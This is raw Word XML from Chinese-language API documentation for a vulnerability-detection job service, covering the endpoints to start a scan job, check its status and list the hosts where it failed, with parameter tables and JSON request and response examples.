    <w:p w14:paraId="4973C419" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7936CC2B"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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>execute</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="46438CB3"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74"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="4087"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="407949C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8798B44" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59E07A2E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13BC25AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33FE5E6D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0C3D884A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="080F0F8A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jobId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44D3CADE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C1A8729" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70BFE192" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业id，必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6EFAF76C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FA2483D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jobType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FBA1F54" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2250CB2F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="108F92AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业类型：1：全局作业 2：用户作业。必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2CF2DEC0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C58309B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>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execute</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>{"jobId":"5c3d7c7a7d761b6b1c9048fd","jobType":2}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4DA7BD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6428DA32" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "flag": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E479685"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1006"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1791"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="6753197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B66246F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4890B866" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72FF077B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CCEDF23" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5923D7FA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A046BE0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16AB706E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A04EFC5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A6F412B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否开始执行成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4F2164FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="239" w:name="_Toc115166194"/>
      <w:bookmarkStart w:id="240" w:name="查询漏洞检测作业执行状态"/>
      <w:bookmarkEnd w:id="238"/>
      <w:r>
        <w:t>查询漏洞检测作业执行状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="239"/>
    </w:p>
    <w:p w14:paraId="4F2C2F93" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2A094B"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status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B37BDC"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74"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="4087"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="73C20B0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0A352E9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14B059AA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C6C8364" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79F98075" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="299F7381" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="762DF590" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jobId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C32966A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BC13927" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EBA3C12" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业id，必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7E565EAD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="651EE418" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jobType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D214A74" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="313226E6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C0B089D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业类型：1：全局作业 2：用户作业。必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="527B0590" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549142BF"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status</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>{"jobId":"5c3d7c7a7d761b6b1c9048fd","jobType":2}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BA86A1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CBC840" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "id": "5c4182e87d761b3224c4293e",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "status": "Running"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CDF917"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788"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1333"/>
        <w:gridCol w:w="3172"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="5B39345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9D9F03F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38E29BB2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="687BCA69" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70111AAC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2E0F3EAF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C99D130" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73FAE145" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AA1152A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10B5EB44" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="161F4035" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19E49525" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="713A708C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69FCAF55" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>7)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DDF2F1D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>扫描的状态（进行中/成功/失败）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="47EEEE78" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="241" w:name="_Toc115166195"/>
      <w:bookmarkStart w:id="242" w:name="查询作业执行失败主机"/>
      <w:bookmarkEnd w:id="240"/>
      <w:r>
        <w:t>查询作业执行失败主机</w:t>
      </w:r>
      <w:bookmarkEnd w:id="241"/>
    </w:p>
    <w:p w14:paraId="343F5ACB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8AF87B"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>error_host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="576B859C"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74"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="4087"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="6E2D162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2F1A67C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B8CC3B5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="023CB65F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3ACA34E7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52B7C67D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jobId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F467E9A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E73C7F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业id，必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="38E55FDD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A5C5F5A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jobType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44C2ECF1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0508AD1A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业类型：1：全局作业 2：用户作业。必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7A918470" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="529B7B93" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31E08B86" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E555459" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>每页数量：默认为50，可选</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7C549E75" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B92C00A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>page</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07DE0326" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B2B6F2A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>当前页，从0开始，默认为0，可选</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="554FE69D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754EF577"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>error_host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t>{"jobId":"5bcef3c67d761b31e34ec895","jobType":"2","size":2,"page":3}</w:t>
      </w:r>
    </w:p>
